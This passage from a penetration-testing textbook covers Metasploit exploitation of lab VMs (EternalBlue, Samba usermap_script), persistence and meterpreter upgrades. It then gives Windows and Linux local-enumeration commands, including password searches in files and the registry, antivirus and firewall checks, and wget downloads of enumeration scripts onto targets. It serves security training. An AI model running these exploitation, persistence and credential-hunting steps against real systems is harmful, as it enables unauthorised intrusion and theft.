After specifying the module, we will need to configure the module options. The main option that we need to modify is the RHOSTS option. The RHOSTS option is used to specify the target IP address, as demonstrated in the following screenshot:

Figure 3.19 – EternalBlue module options

We can set the RHOSTS option by running the following command:

set RHOSTS <IP-ADDRESS>

We can also set the payload to be used and the payload listener options, as specified in Figure 3.20. We use the default options specified by the module.
After setting the RHOSTS option, we can run the auxiliary module with the following command:

run

If the exploit is successful, we should get a meterpreter session on the target system, as illustrated at the bottom of the following screenshot:

Figure 3.20 – The successful exploitation of eternalblue

What is meterpreter?

Meterpreter is an advanced payload that uses in-memory Dynamic Link Library (DLL) injection and provides attackers with an advanced interactive shell that can be used to explore the target system, run system commands, and execute code.

The meterpreter shell gives us the ability to explore the system and run commands. However, we still need to set up persistence in the event that our connection is terminated, or the system is restarted. We can do this by using the persistence module within Metasploit. However, before we can use this module, we will need to send our meterpreter session into background by running the following command:

background

Figure 3.21 outlines a list of active meterpreter sessions and their corresponding details:

Figure 3.21 – The background meterpreter session

After the meterpreter session is in the background, we can load the persistence module by running the following command:

use exploit/windows/local/persistence

We now need to configure the module options. In this case, we need to change the SESSION option by running the following command:

set SESSION 1

Additionally, we need to change the payload option, in particular, the LPORT option, this can be done by running the following command:

set LPORT 4443

Figure 3.22 outlines the various options available for the persistence module. The highlighted options are the values that need to be changed:

Figure 3.22 – The persistence module options

After setting the module options, we can run the module with the following command:

run

If successful, the persistence module should install VBS script and autorun to the registry, as shown in Figure 3.23:

Figure 3.23 – The persistence module is successful

We have successfully exploited and set up persistence on our Metasploitable3 host. Next, we will look at how to exploit Metasploitable2, which is our Linux host.

Exploiting Metasploitable2

In the Information gathering and footprinting section, we were able to identify an exploit for the Samba smbd 3.0.20 service. Let's take a look at how we can use this exploit to gain access:

The first step is to fire up msfconsole and search for the Samba 3.0.20 exploit module by running the following command:

search samba 3.0.20

The module we will use is the exploit module, called exploit/multi/samba/usermap_script, as demonstrated in the following screenshot:

Figure 3.24 – The Metasploitable2 exploit module

To use this module, we will run the following command:

use exploit/multi/samba/usermap_script

After specifying the module, we will need to configure the module options. The main option that we need to modify is the RHOSTS option. The RHOSTS option is used to specify the target IP address, as shown in Figure 3.25:

Figure 3.25 – The Metasploitable2 exploit module options

We can set the RHOSTS option by running the following command:

set RHOSTS <IP-ADDRESS>

We can also set the payload to be used and the payload listener options, as specified in Figure 3.25. We use the default options specified by the module.
After setting the RHOSTS option, we can run the auxiliary module with the following command:

run

If the exploit is successful, we should get a command shell on the target system, as demonstrated in the following screenshot:

Figure 3.26 – The Metasploitable2 command shell

We can use the command-shell session to run system commands and explore the system. However, for more consistent access, we will need to upgrade the command shell to a meterpreter session. We can do this by moving the command-shell session to the background. This can be done by using the keyboard combination of Ctrl + Z, as shown in Figure 3.27:

Figure 3.27 – The Metasploitable2 background command shell

After the command-shell session has moved to the background, we can load the shell to the meterpreter module by running the following command:

use post/multi/manage/shell_to_meterpreter

We now need to configure the module options. Here, we need to change the SESSION option. We can do this by running this command:

set SESSION 1

Additionally, we can change the payload option, LPORT, by running the following command:

set LPORT 4443

Figure 3.28 outlines the options available for the shell_to_meterpreter module:

Figure 3.28 – The shell_to_meterpreter module options

After setting the module options, we can run the module with the following command:

run

If successful, the shell_to_meterpreter module should send a new stage and launch a meterpreter session in the background, as demonstrated in the following screenshot:

Figure 3.29 – The shell_to_meterpreter module is successful

We can switch to this session by running the following command:

sessions 2

As you can see in Figure 3.30, we have successfully upgraded our command shell to a meterpreter session:

Figure 3.30 – The Metasploitable2 meterpreter session

We have now been able to successfully exploit a Windows and Linux host via different exploitation vectors to gain our initial foothold onto the system. We are now ready to begin the privilege escalation process.

Summary

In this chapter, we started by familiarizing ourselves with the structure of the Metasploit framework. We then looked at how to perform both footprinting and vulnerability analyses on our targets with Nmap and Metasploit. We then ended the chapter by exploring how to use the information we gathered during footprinting to successfully exploit a Windows and Linux host through the operating system and service vulnerabilities.

Now that we have learned how to establish our initial foothold on the system, we can learn how to perform local system enumeration.

In the next chapter, we will discover the various tools and techniques that we can use to enumerate information from our target systems and explore how to use this information to stage a privilege escalation attack.

===== FILE 9/21: B17389_04_Final_PG_ePub.xhtml =====

Chapter 4: Performing Local Enumeration

Now that we have our initial foothold on the target system, we need to enumerate additional information from the target that will be vital and pivotal to the privilege escalation process. This information will be used to structure, plan, and coordinate our privilege escalation attacks successfully.

Therefore, it is vitally important to learn how to enumerate information correctly and comprehensively from a target system in order to successfully escalate privileges.

In this chapter, you will learn about the enumeration process, why it is important, and the various local enumeration techniques for Windows and Linux. You will then learn how to use automated enumeration tools to automate processes.

In this chapter, we're going to cover the following main topics:

Understanding the enumeration process
Windows enumeration
Linux enumeration
Technical requirements

To follow along with the demonstrations in this chapter, you will need to ensure that you meet the following technical requirements:

Familiarity with Linux Terminal commands
Familiarity with the Windows command line

Check out the following link to see the Code in Action video:

https://bit.ly/39JFTjW

Understanding the enumeration process

Although you gained an initial foothold on a system in Chapter 3, Gaining Access (Exploitation), you have little or no information regarding what operating system is running, what services are running, your privileges on the system, and what networks the target system is connected to. This leaves you blind and in no position to initiate a privilege escalation attack. This is where enumeration comes into play.

Enumeration is the process of extracting vital information such as operating system versions, usernames, network information, and installed programs from a target system. This information can then be used to identify potential flaws, misconfigurations, or vulnerabilities that can be exploited.

The enumeration process can be analogized through the example of planning a heist, where reconnaissance and information gathering on the target is paramount. If insufficient information regarding the target is obtained, the heist will be marred with mistakes and will, in all probability, end up failing. However, if information regarding the target is diligently and comprehensively gathered, the heist will be efficient since all the relevant information has been gathered and analyzed for potential mistakes and issues. Therefore, it is vitally important to perform comprehensive enumeration on your target systems.

Local enumeration involves actively gathering information from the target system after its initial exploitation. This information is then used to identify potential privilege escalation vectors through vulnerabilities or configurations.

The local enumeration process is multi-faceted and can therefore be categorized based on the type of information being gathered:

System enumeration
User and group enumeration
Network enumeration
Password enumeration
Firewall and antivirus enumeration

This categorization will be useful in structuring and organizing the information we will be gathering. Local enumeration can be performed manually and automatically by using frameworks and scripts; however, it is always recommended to perform manual enumeration as it ensures the process is performed comprehensively and diligently.

In the following sections, we will be exploring the various techniques and tools that can be used to perform local enumeration both manually and automatically on Windows and Linux.

In this chapter, we will be using the following target virtual machines that we exploited in the previous chapter:

Metasploitable3
Windows 10
Metasploitable2
Ubuntu 20.04

The purpose of using multiple operating system versions is to demonstrate and highlight the variety of information that can be gathered based on the operating system's version and configuration. The techniques demonstrated in this chapter will work on most Windows releases and Linux distributions with a few exceptions, all of which will be highlighted.

Now that we understand what enumeration is and its importance in the privilege escalation process, we can take a look at how to enumerate information from Windows systems.

Windows enumeration

We will begin the enumeration process on Windows manually and follow the previously listed categories in our approach. To begin the local enumeration process, you will need to ensure that you have direct access to your target system in the form of a shell. If you have followed the examples demonstrated so far in this book, you should have a meterpreter session on your target systems.

System enumeration

System enumeration is the process of enumerating core system information such as the operating system's version and service pack, the operating system's architecture, the system services that are running, and the installed patches and hotfixes.

We can begin the process of system enumeration by following these steps:

Most of the commands we will be running are native to the Windows command prompt, so they need to be run within a native shell session. If you already have one, you can skip this step. Alternatively, if you are running a meterpreter session, you will need to run the following command, as outlined in the following screenshot, to get a command prompt session:

shell

As shown in the following screenshot, you should get an active shell on the target system through the command prompt, and you should be able to run Windows-specific commands:

Figure 4.1 – Meterpreter command prompt

The first step is to enumerate operating system information. This can be done by running the systeminfo command and piping the output to the findstr utility to limit the output to the information that is essential. This can be done by running the following command:

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

As highlighted in the following screenshot, the command will output the operating system's name, version, and architecture. This information can be used in conjunction with automated vulnerability assessment tools to determine inherent privilege escalation vulnerabilities. It is also useful for sorting through exploits for a particular operating system architecture. The operating system version is also useful for finding kernel-based exploits for specific versions of an operating system.

This gives us enough information regarding the operating system to narrow down our approach regarding finding vulnerabilities:

Figure 4.2 – systeminfo command output

We can also use the systeminfo command to determine what Windows hotfixes or patches have been installed. This can be done by running the following command:

systeminfo

The output of the preceding command is as follows:

Figure 4.3 – Hotfixes installed

As highlighted in the preceding screenshot, the output lists the total number of hotfixes that have been installed and their relevant HotFix IDs. This information is useful for finetuning your approach in terms of vulnerabilities in the operating system that may have already been patched.

Note

The default output of the systeminfo command is detailed and provides you with a complete overview of the operating system.

You can also determine the hotfixes and patches that have been installed on a system by running the following command:

wmic qfe

The output of the preceding command is shown in the following screenshot:

Figure 4.4 – Installed updates

As illustrated in the preceding screenshot, the command outputs the updates or patches that have been installed and provides additional information, such as the date the patches were installed and the user that installed them.

The HotFixID can be used to determine potential vulnerabilities and exploits for specific hotfixes.

We can also run the command on a Windows 10 system to determine the patches that have been installed and how recently this happened, as shown in the following screenshot:

Figure 4.5 – Windows 10 installed updates

The next piece of information we must enumerate is the operating system's hostname. This can be done by running the following command:

hostname

The output of the preceding command is as follows:

Figure 4.6 – Hostname

The hostname is used to identify systems on a network and may shed some light on the role of the system or the person the system belongs to.

Another important piece of information to enumerate is the drives attached to the system. We can do this by running the following command:

wmic logicaldisk get caption

The output of the preceding command is as follows:

Figure 4.7 – Logical disks

As shown in the preceding screenshot, the command will output the list of attached drives and their identifier. In this case, the only disk that's attached is the system drive labeled C:.

It is also important to enumerate information regarding the processes that are currently running. This can be done by running the following command:

tasklist /SVC

The output of the preceding command is as follows:

Figure 4.8 – Running processes

As shown in the preceding screenshot, the command will output a list of processes that are running and their associated services. It also displays the process ID, which can be useful for identifying a particular process.

Now that we have an understanding of what the target system is running, we can start identifying the users on the target system.

User and group enumeration

User enumeration is the process of identifying the user we are currently utilizing and the user accounts that are on the target system. This information is useful as it tells us whether we have administrative privileges. It also helps us determine and identify potential user accounts that we can utilize to elevate our privileges.

The user enumeration process on Windows is fairly straightforward and can be performed by following these steps:

First, we need to determine the user that we are currently using. This can be done by running the following command:

whoami

If you have administrative privileges, your username should be nt authority, as shown in the following screenshot:

Figure 4.9 - whoami

We can also determine our privileges by running the following command:

whoami /priv

The output of the preceding command is as follows:

Figure 4.10 – whoami privileges

As shown in the preceding screenshot, this will output the privileges that have been assigned to our account and provides a brief description of each privilege, along with their current states. We looked at privileges briefly in Chapter 1, Introduction to Privilege Escalation, where we explained access tokens. The importance of privileges will be highlighted later in this book, when we look at token impersonation attacks.

To determine the groups that our account is part of, we can run the following command:

whoami /groups

The output of the preceding command is as follows:

Figure 4.11 – whoami groups

We can also enumerate the user accounts that are active on the system by running the following command:

net user

The output of the preceding command is as follows:

Figure 4.12 – net user

As shown in the preceding screenshot, the command will output a list of all the users on the system. This provides helpful information regarding what accounts we can laterally escalate our privileges to. We can also obtain additional information about a particular user by running the following command:

net user <username>

This can also help us identify accounts that are part of the administrative group and have admin privileges, as shown in the following screenshot:

Figure 4.13 – User enumeration

We can also determine the users that are part of the administrative group by running the following command:

net localgroup administrators

The output of the preceding command is as follows:

Figure 4.14 – Net localgroup

As shown in the preceding screenshot, the command will outline the users that are part of the administrative group. This gives us a clear picture of the accounts we can target to obtain administrative privileges.

Network enumeration

Network enumeration is the process of obtaining all the relevant network information from a target system with the aim of determining its IP address, DNS server, default gateway, and domain controller, if any. This information can be used to map out the target network and stage pivoting attacks. Let's take a look:

The first step involves enumerating the target network interfaces and their details. This can be done by running the following command:

ipconfig /all

The output of the preceding command is as follows:

Figure 4.15 – ipconfig

As shown in the preceding screenshot, this will display all the relevant network information regarding a particular NIC: its IP address, DNS server, and default gateway.

The next step is to analyze the routing table. This can be done by running the following command:

route print

The output of the preceding command is as follows:

Figure 4.16 – Routing table

We also need to determine what services we have running and their respective ports. This can be done by running the netstat command with the following arguments:

netstat -ano

The output of the preceding command is as follows:

Figure 4.17 – Netstat active connections

As shown in the preceding screenshot, the command will display all the active connections, along with their respective ports and process IDs (PIDs).

This command can also be used to identify active connections from other hosts, as shown in the following screenshot:

Figure 4.18 – Netstat established connections

This information is important as it may also reveal internal services that are running that were previously undetected during the initial footprinting phase and are running locally.

Now that we have enumerated the networking information from the target, we will learn how to find and enumerate passwords.

Password enumeration

Password enumeration is the process of finding and locating passwords stored locally in the form of stored user passwords in clear text, configuration files with passwords, passwords stored in the Windows registry, and Windows hashes stored in the Security Account Manager (SAM) database.

We will explore password enumeration in greater detail when we explore automated tools, since the process of manually enumerating passwords from the registry and SAM database can be time consuming.

In this section, we will utilize manual techniques such as string matching. Let's get started:

We can utilize the findstr utility to locate specific strings in files. For example, we can run the following command to locate the password string in files with commonly used file extensions:

findstr /si password *.doc *.txt *.ini *.config

This can be useful for finding cleartext passwords stored by users or administrators that may contain passwords for other accounts or services.

We can also search for specific strings pertaining to services such as Secure Shell (SSH) and File Transfer Protocol (FTP). This can be done by running the following command:

dir /s *pass* == *cred* == *ssh* == *.config*

We can search for passwords within the registry for specific programs and software by running the following query:

reg query HKLM /f password /t REG_SZ /s

This will display any entries that contain the password string within the HKEY_LOCAL_MACHINE registry, as shown in the following screenshot. You can also run the same query for the HKEY_CURRENT_USER registry. This can be done by running the following command:

reg query HKCU /f password /t REG_SZ /s

The output of the preceding command is as follows:

Figure 4.19 – Password enumeration in the Windows Registry

We can also search for passwords in configuration files and session information for specific programs such as PuTTY or VNC. This can be done by running the following command and specifying the program's default registry directory:

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions\<User>"

In this case, the query will display the PuTTY session details for the user that was specified within the query.

Note

The user Simon Tatham highlighted in the HKCU\Software\SimonTatham\PuTTY\Sessions\<User> registry directory references the developer of the PuTTY program.

Now that we understand how to use manual querying techniques to enumerate passwords from Windows, we need to identify and map out the security features that are currently active on the system.

Firewall and antivirus enumeration

To successfully elevate our privileges and maintain persistence on a system, we need to understand the security measures and systems that are in place that could hinder the process. Two of the most common security deterrents found on Windows systems are Windows Firewall and Windows Defender, though other third-party antivirus solutions may help.

The ability to detect and evade firewalls and antivirus solutions is important during a penetration test. This is because the privilege escalation process involves actively engaging with the target and transferring files to and from the target system. Firewalls and antivirus solutions can hinder the process and can alert a security team or administrator about a potential breach. For this reason, it is important to enumerate information regarding the firewall's status and rules, as well as the antivirus solution in place. Let's take a look:

First, you will need to identify the status of Windows Defender before copying over any files. This can be done by running using the service control command:

sc query windefend

Given the intentionally vulnerable design of the Metasploitable3 virtual machine, Windows Defender has not been enabled, so we must render the system vulnerable and unprotected, as shown in the following screenshot:

Figure 4.20 – Windows Defender disabled

If Windows Defender is enabled and active, you should get an output similar to the following:

Figure 4.21 – Windows Defender enabled and running

To identify third-party antivirus solutions, you can list the services that are running on the system. This can be done by running the following command:

sc queryex type=service

If a third-party antivirus solution is running, you should be able to identify it by analyzing the service name, as shown in the following screenshot. Here, I have been able to detect a second third-party antivirus program running in tandem with Windows Defender:

Figure 4.22 – Third-party A/V

We also need to enumerate information regarding the firewall's status and configuration. This will help us detect the ports that are open and can be utilized for further attacks. This can be done by running the following command:

netsh firewall show state

The output of the preceding command is as follows:

Figure 4.23 – Firewall status

As shown in the preceding screenshot, the command will output the firewall's operational mode, profile, and open ports. This gives us a clear idea of what we can and cannot do from a networking perspective.

We should now have a clear idea of what our target system is running and how it is configured. Now, let's learn how to use various automation tools to simplify the enumeration process.

Automated enumeration tools

Automated enumeration offers a much more targeted and time-efficient approach to gathering information from a target system and, consequently, making sense of it. The primary objective behind using automated enumeration tools is the ability to make sense of, as well as contextualize, the information that's been gathered and provide recommendations based on it.

Many automated enumeration tools for Windows exist. However, we will only be focusing on the tools that have a high probability of working and do not require any additional dependencies or access to specific utilities.

Local Exploit Suggester

The Local Exploit Suggester is a post-exploitation module for Metasploit that is used to scan a target for potential exploits based on operating system information. It automates the process of enumerating the system information and provides exploit recommendations based on the operating system's version and installed patches. Let's take a look:

To use the module, you will need to have meterpreter access on a target system, after which you will need to move the meterpreter session to the background and load the local_exploit_suggester module. This can be done by running the following command:

use post/multi/recon/local_exploit_suggester

Now, you need to configure the module options. The only option that we need to set is the session number, as shown in the following screenshot. This can be done by running the following command:

set SESSION <Session Number>

The output of the preceding command is as follows:

Figure 4.24 – Local Exploit Suggester

After configuring the options, you can run the module. At this point, the module will begin the enumeration process and output the results after a few minutes, as shown in the following screenshot:

Figure 4.25 – Local Exploit Suggester results

The output from the module will display the various exploit modules, most of which are kernel exploits that can be used against the target. We will explore this in the next section.

Windows Exploit Suggester

Windows Exploit Suggester is an open source utility developed in Python that allows you to scan for potential vulnerabilities in Windows operating systems. It also provides their corresponding exploits or exploit modules.

It works by comparing the Windows patch levels against the Microsoft vulnerability database to detect vulnerabilities. It does this by identifying any missing patches on the system.

It does not need to be run locally on the target system and only requires the output from the systeminfo command on the target. Let's get started:

The first step involves cloning the repository at https://github.com/AonCyberLabs/Windows-Exploit-Suggester onto our Kali VM. This can be done by running the following command:

git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git

The tool requires Python2 to work as it utilizes various Python2 modules.

Note

Python2 is currently deprecated as of January 1, 2020. This means that you may encounter issues with dependencies for older tools and frameworks.

After cloning the repository, you will need to install the required dependencies. This can be done by running the following commands:

sudo apt-get install python-xlrd

pip install xlrd --upgrade

After installing the dependencies, you will need to update the database by running the script with the following flag:

./windows-exploit-suggester.py –update

The output is shown in the following screenshot:

Figure 4.26 – Windows Exploit Suggester update

Take note of the database's filename, as highlighted in the following screenshot, as it will be used in the scanning phase:

Figure 4.27 – Windows Exploit Suggester database file

The next step involves enumerating the target system information by running the systeminfo command, after which you will need to copy and paste the output of the command to a .txt file.
After saving the output of the systeminfo command to a .txt file, you can run the script to check for vulnerabilities, like so:

./windows-exploit-suggester.py --database <database-file>.xlsx --systeminfo <systeminfo-output>.txt

The output of this command is as follows:

Figure 4.28 – Windows Exploit suggester output

As shown in the preceding screenshot, the script will perform a scan and output a list of all the potential vulnerabilities and relevant information, such as the POC reference and exploit code or modules available on exploit-db or GitHub.

This information will be useful in the next chapter, when we explore kernel exploitation on Windows.

Other enumeration tools

As we mentioned earlier in this section, many automated enumeration tools exist and can provide additional functionality and information, most of which we will explore later in this book.

The following is a list of useful enumeration tools and frameworks for Windows:

Windows Privilege Escalation Awesome Script (winPEAS): https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe
Sherlock: https://github.com/rasta-mouse/Sherlock
Just Another Windows Enumeration Script (JAWS): https://github.com/411Hall/JAWS
Watson: https://github.com/rasta-mouse/Watson

Now that we know how to perform local enumeration on Windows, we will learn how to perform local enumeration on Linux.

Linux enumeration

Local enumeration on Linux is similar to Windows and involves using manual techniques and tools to enumerate important information. In this section, we will explore a few automated tools that help simplify and streamline the enumeration process.

Note

Package managers will vary based on the Linux distribution in question. This will be pointed out and highlighted in the following sections.

System enumeration

System enumeration is the process of enumerating core system information such as the operating system's version, kernel version, operating system architecture, and the services that are running.

We can perform system enumeration by following these steps:

The first piece of information we will need to enumerate is the operating system's information. This can be done by running the following command:

cat /etc/*-release

You can also use the Linux Standard Base (LSB) information. This can be done by running the following command:

lsb_release -a

If these commands do not work, you can use the hostname systemd utility by running the following command:

hostnamectl

You will also need the kernel version and operating system architecture. This will be useful in determining vulnerabilities and finding kernel exploits. This can be done by running the following command:

uname -a

The output of the preceding command is as follows:

Figure 4.29 – Linux kernel version

As shown in the preceding screenshot, the command will output the kernel version and system architecture.

You will also need to identify the processes that are running as root. This is useful as you can utilize these processes to execute arbitrary commands as root. This can be done by running the following command:

ps aux | grep root

As shown in the following screenshot, this will list all the processes running as root:

Figure 4.30 – Linux services running

Another potential privilege escalation access vector on Linux is any programs and software that have been installed. We can determine the software that's been installed on the system by listing the content of the following directories:

a) /usr/local

b) /usr/local/bin

c) /opt/

d) /var

e) /usr/src

You can list the installed packages on Debian systems by running the following command:

dpkg -l

If the target is running RHEL or Fedora, you can list the installed software by running the following command:

rpm -qa

Now that we have enumerated information regarding the operating system's version and kernel version, we will learn how to enumerate user and group information on Linux.

We can also enumerate information from cron to determine what cron jobs are running and if they can be leveraged to execute commands or binaries. This can be done by running the following commands:

crontab -l

ls -al /var/spool/cron

ls -al /etc/ | grep cron

ls -al /etc/cron*

cat /etc/cron*

cat /etc/at.allow

cat /etc/at.deny

cat /etc/cron.allow

cat /etc/cron.deny

cat /etc/crontab

cat /etc/anacrontab

cat /var/spool/cron/crontabs/root

Now that we have a clear picture of what is running on our target system, we can begin enumerating users and groups.

User and group enumeration

User enumeration is the process of identifying the user we are currently utilizing and the user accounts that are on the target system. This information is useful as it tells us whether we have administrative privileges. It also helps us determine and identify potential user accounts that we can utilize to elevate our privileges.

The user enumeration process on Linux is fairly straightforward and can be performed by following these steps:

First, we need to determine the user that we are currently using. This can be done by running the following command:

whoami

The output of the preceding command is as follows:

Figure 4.31 – whoami Linux

If you have administrative privileges, your username should be root, as shown in the preceding screenshot.

You can also enumerate the other user accounts on the system by running the following command:

cat /etc/passwd

To determine the groups that our account is part of, run the following command:

groups <username>

The output of the preceding command is as follows:

Figure 4.32 – Linux groups

You can also list the groups on the system by running the following command:

cat /etc/group

You can search for SUID binaries that can be exploited and run with root privileges to run arbitrary commands. This can be done by running the following command:

find / -perm -u=s -type f 2>/dev/null

Now, let's learn how to enumerate network information from the target system.

Network enumeration

Network enumeration is the process of obtaining all the relevant network information from a target system with the aim of determining its IP address, DNS server, default gateway, and domain controller, if any. This information can be used to map out the target network and stage pivoting attacks. Let's take a look:

The first step involves enumerating the target network interfaces and their details. This can be done by running the following command:

ifconfig

The output of the preceding command is as follows:

Figure 4.33 – ifconfig

The next step is analyzing the routing table. This can be done by running the following command:

route

The output of the preceding command is as follows:

Figure 4.34 – Linux routing table

We also need to determine what services we have running and their respective ports. This can be done by running the netstat command with the following arguments:

netstat -ant

The output of the preceding command is as follows:

Figure 4.35 – Netstat active connections

As shown in the preceding screenshot, the command will display all the active connections and their respective ports.

This information is important as it may also reveal internal services that are running locally that previously went undetected during the initial footprinting phase.

We should now have a clear idea of what our target system is running and how it is configured. Now, let's learn how to use various automation tools that will help simplify the enumeration process.

Automated enumeration tools

Many automated enumeration tools for Linux exist. This section will focus on the enumeration tools that will provide us with meaningful and actionable information.

LinEnum

LinEnum is a bash script that automates the local enumeration process on Linux and provides comprehensive information to help specify the information required, as well as the ability to generate reports.

You can learn more about the script at https://github.com/rebootuser/LinEnum. Let's get started:

To use the tool, we will need to download the bash script from GitHub and transfer it over to our target. If the target has internet access, we can download the script directly by running the following command:

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

If the target prevents any incoming connections, we can upload the script from our local system to the target through meterpreter, as shown in the following screenshot:

Figure 4.36 – LinEnum download

We can then execute the script with the following arguments:

./LinEnum.sh -t -r <report-name>

This will enumerate all the relevant information and will also display potentially useful vulnerabilities that can be exploited, as shown in the following screenshot:

Figure 4.37 – LinEnum results

We can also use the keyword functionality to enumerate passwords on the system. This can be done by running the following command:

./LinEnum.sh -k password

Now, let's learn how to enumerate potential vulnerabilities on the target system.

Linux Exploit Suggester

Linux Exploit Suggester is an open source shell script that allows you to scan for potential kernel vulnerabilities on Linux. It provides their corresponding exploits or exploit modules. Let's get started:

The script needs to be run locally on the target system. First, we need to download the script on to the target system. This can be done with wget, like so:

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

After downloading the script onto the target, you need to ensure the script has executable permissions. This can be done by running the following command:

chmod +x les.sh

You can now run the script to begin the scanning process, after which the script will output a list of potential vulnerabilities and their corresponding POCs and exploits.

Now that you have a grip on how to use various enumeration tools, let's explore some of the other automated enumeration tools that can be used.

Other enumeration tools

As we mentioned earlier in this section, many automated enumeration tools exist and can provide additional functionality and information, most of which we will explore later in this book.

The following is a list of useful enumeration tools and frameworks for Linux:

Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
Linux Priv Checker – linuxprivchecker.py: A Linux Privilege Escalation Check Script
Privilege Escalation Scripts: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
LinEnum: https://github.com/rebootuser/LinEnum

With that, we've learned how to enumerate information from Windows and Linux systems. Now, we are ready to start using this information to stage privilege escalation attacks.

Summary

In this chapter, we started by learning about the enumeration process. We then looked at how to perform local enumeration manually and automatically on Windows. Finally, we learned how to perform local enumeration on Linux.

Now that we have learned how to perform local enumeration on Windows and Linux, we can begin the privilege escalation process.

In the next chapter, we will begin the privilege escalation process on Windows by using kernel exploits.

===== FILE 10/21: B17389_Section2_Final_PG_ePub.xhtml =====

Section 2: Windows Privilege Escalation

This section will cover the privilege escalation process on Windows systems. You will be able to elevate privileges on the target system through the use of multiple privilege escalation attack vectors, techniques, and tools.

The following chapters are included in this section:

Chapter 5, Windows Kernel Exploits
Chapter 6, Impersonation Attacks
Chapter 7, Windows Password Mining
Chapter 8, Exploiting Services
Chapter 9, Privilege Escalation through the Windows Registry

===== FILE 11/21: B17389_05_Final_PG_ePub.xhtml =====

Chapter 5: Windows Kernel Exploits

Now that we have learned how to enumerate important information from our target system and have identified potential privilege escalation attack vectors, we can begin the privilege escalation process on Windows. The first privilege escalation attack vector we will be exploring is kernel exploitation.

In this chapter, you will learn how to identify, transfer, and utilize kernel exploits on Windows both manually and automatically.

You will learn how a kernel works and how you can leverage kernel vulnerabilities to elevate your privileges on the target system. This is a vital part of the privilege escalation process as kernel vulnerabilities provide a straightforward way of elevating your privileges on a target system.

In this chapter, we're going to cover the following main topics:

Understanding kernel exploits
Kernel exploitation with Metasploit
Manual kernel exploitation
Technical requirements

To follow along with the demonstrations in this chapter, you will need to ensure that you have familiarity with Windows CMD commands.

You can view this chapter's code in action here: https://bit.ly/3m7qa47

Understanding kernel exploits

Before we can get started with utilizing various kernel exploits on Windows, it is vitally important to understand what a kernel is and how it is set up and configured.

This will give you a clearer picture of how and why kernels are exploited and how they can be exploited to elevate privileges on Windows.

Let's begin by understanding what a kernel is and what functions it serves in the context of an operating system.

What is a kernel?

A kernel is a computer program that is the core of an operating system and has complete control over every resource and hardware on a system. It acts as a translation layer between hardware and software and facilitates the communication between these two layers.

The kernel runs in system memory and is loaded immediately after the bootloader during the system startup process and is responsible for handling the remaining startup procedures for the operating system.

The kernel is responsible for performing the following main functions:

Memory management: The kernel is responsible for reading to, writing to, allocating, and deallocating system memory.
Device management: The kernel is responsible for managing and facilitating the I/O operations between the hardware peripherals and the operating system.
I/O management: The kernel is responsible for facilitating and managing the I/O operations between system resources such as the CPU and system memory.
Resource management: The kernel is responsible for managing the allocation and sharing of memory between various programs and processes.

As illustrated in the following diagram, the kernel acts as an intermediary between hardware and software and facilitates and translates their interaction:

Figure 5.1 – Kernel structure

Now that we have a clear understanding of what a kernel is, what its functions are, and its role in an operating system, it becomes clear that a vulnerability within the kernel can be exploited and can potentially lead to privileged access and control over a system. It is for this reason that kernel exploits are valued by attackers during the privilege escalation process, as they offer a straightforward path for elevating privileges.

It is to be noted, however, that kernel exploits can be unstable and may lead to system crashes and therefore need to be executed with tact and care. This is primarily because kernel exploits target the kernel and its functionality, therefore interfering with the core operation of the operating system as a whole. Consequently, system crashes caused by kernel exploits can lead to data loss and damage the operating system as a whole, which can become a liability during a penetration test.

Let's take a brief look at the Windows kernel and how it is structured to get an understanding of how it functions.

Windows NT

Windows NT is the kernel that comes pre-packaged with all versions of Microsoft Windows and operates like a traditional kernel with a few exceptions based on user design philosophy. It consists of two main modes of operation that determine access to system resources and hardware:

User mode: Programs and services running in user mode have limited access to system resources and functionality.
Kernel mode: Kernel mode has unrestricted access to system resources and functionality with the added functionality of managing devices and system memory.

As illustrated in the following diagram, the two main modes of operation are used to segregate access to resources and hardware:

Figure 5.2 – Windows kernel structure

User mode consists of system-defined processes that communicate with the kernel through the use of Windows APIs. The processes running in user mode can also communicate with devices by sending I/O requests to the kernel-mode device drivers as highlighted in Figure 5.2.

Kernel mode has access to all devices and system resources and is also responsible for preventing user-mode services from interacting with and accessing functionality that they do not have access to.

Now that we have an understanding of how the Windows kernel functions and how it is structured, we can begin to delve into the Windows kernel exploitation process.

The Windows kernel exploitation process

The Windows operating system is vulnerable to various attacks that can lead to exploitation or privilege escalation. We have already explored the process of identifying these vulnerabilities and their corresponding exploits in the previous chapter. In this chapter, we will be primarily focusing on how to correctly identify and exploit unpatched and vulnerable Windows systems to elevate our privileges.

This process will follow a two-pronged approach that will encompass the process of utilizing kernel exploits both manually and automatically.

Kernel exploits on Windows will typically target vulnerabilities in the Windows kernel to execute arbitrary code in order to run privileged system commands or to obtain a system shell. This process will differ based on the version of Windows being targeted and the kernel exploit being used.

In this chapter, we will be using the Windows 7 SP1 target virtual machine in our virtual hacking lab.

We can now begin the kernel exploitation process with the Metasploit framework. This will allow us to automate the process of identifying and exploiting kernel vulnerabilities on Windows.

Kernel exploitation with Metasploit

We can begin the kernel exploitation process by taking a look at how to use kernel exploits with the Metasploit framework. The Metasploit framework will offer an automated and modularized solution and will streamline the exploitation process.

For this section, our target system will be the Windows SP1 virtual machine. As a prerequisite, ensure that you have gained your initial foothold on the system and have a Meterpreter session:

The first step involves scanning the target for potential exploits. We will be using the local_exploit_suggester module. This process was covered in depth in the previous chapter.
We can load the module in Metasploit by running the following command:

use post/multi/recon/local_exploit_suggester

After loading the module, you will need to set the SESSION option for the module. The SESSION option requires the session ID of your Meterpreter session. This can be done by running the following command:

set SESSION <SESSION-ID>

As illustrated in the following screenshot, the SESSION option should reflect the session ID you set:

Figure 5.3 – local_exploit_suggester options

After configuring the module options, we can run the module by running the following command:

run

This will begin the scanning process. During the process, the module will begin to output the various exploits that the target is potentially vulnerable to as highlighted in the following screenshot:

Figure 5.4 – local_exploit_suggester results

We can begin testing the various exploit modules recommended by local_exploit_suggester. The first few modules in the output usually have a higher chance of working successfully. We can test the first module in the list as highlighted in Figure 5.4 by loading the module. This can be done by running the following command:

use /exploit/windows/local/bypassuac_eventvwr

